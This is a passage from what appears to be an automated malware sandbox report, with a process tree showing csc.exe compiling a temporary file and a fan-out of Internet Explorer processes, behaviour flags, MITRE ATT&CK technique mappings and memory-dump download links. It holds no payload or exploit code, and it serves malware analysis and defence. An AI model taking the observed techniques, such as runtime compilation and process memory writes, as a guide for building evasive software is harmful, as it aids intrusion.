      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4468
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES312A.tmp" "c:\Users\Admin\AppData\Local\Temp\15u10d5z\CSCF125F687492A430B9A63A17B8B80657.TMP"
        7⤵
        
        PID:3232

C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
1⤵
PID:4572

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4760
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17410 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4636
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82950 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2500
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82954 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:856
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82958 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3212
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82962 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4152
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82966 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1148
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82970 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2448
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17412 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4460
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17414 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3216
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82978 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3616
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82982 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4104 -ip 4104
1⤵
PID:388

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Connection Proxy

T1090

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Connection Proxy

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/228-162-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

Filesize
756KB

Download
memory/228-159-0x0000024E2ABD0000-0x0000024E2B691000-memory.dmp

Filesize
10.8MB

Download
memory/228-160-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

Filesize
756KB

Download
memory/228-161-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

Filesize
756KB

Download
memory/2996-177-0x0000000001590000-0x00000000015A5000-memory.dmp

Filesize
84KB

Download
memory/2996-176-0x00000000015B0000-0x00000000015C5000-memory.dmp

Filesize
84KB

Download
memory/3716-155-0x000001EA1BE33000-0x000001EA1BE35000-memory.dmp

Filesize
8KB

Download
memory/3716-156-0x000001EA1BE36000-0x000001EA1BE38000-memory.dmp

Filesize
8KB

Download
memory/3716-150-0x000001EA1DD30000-0x000001EA1E7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3716-154-0x000001EA1BE30000-0x000001EA1BE32000-memory.dmp

Filesize
8KB

Download
memory/4104-136-0x00000000005B0000-0x00000000005BC000-memory.dmp

Filesize
48KB

Download
memory/4104-134-0x000000000042E000-0x000000000043A000-memory.dmp

Filesize
48KB

Download
memory/4104-138-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4104-135-0x000000000042E000-0x000000000043A000-memory.dmp

Filesize
48KB

Download
memory/4104-175-0x00000000001C0000-0x00000000001CE000-memory.dmp

Filesize
56KB

Download
memory/4104-137-0x0000000001000000-0x000000000106F000-memory.dmp

Filesize
444KB

Download
memory/4624-153-0x0000023D2A5A6000-0x0000023D2A5A8000-memory.dmp

Filesize
8KB

Download
memory/4624-152-0x0000023D2A5A3000-0x0000023D2A5A5000-memory.dmp

Filesize
8KB

Download
memory/4624-151-0x0000023D2A5A0000-0x0000023D2A5A2000-memory.dmp

Filesize
8KB

Download
memory/4624-149-0x0000023D11640000-0x0000023D12101000-memory.dmp

Filesize
10.8MB

Download
memory/4624-173-0x0000023D2A560000-0x0000023D2A573000-memory.dmp

Filesize
76KB

Download
memory/4624-148-0x0000023D2A4D0000-0x0000023D2A4F2000-memory.dmp

Filesize
136KB

Download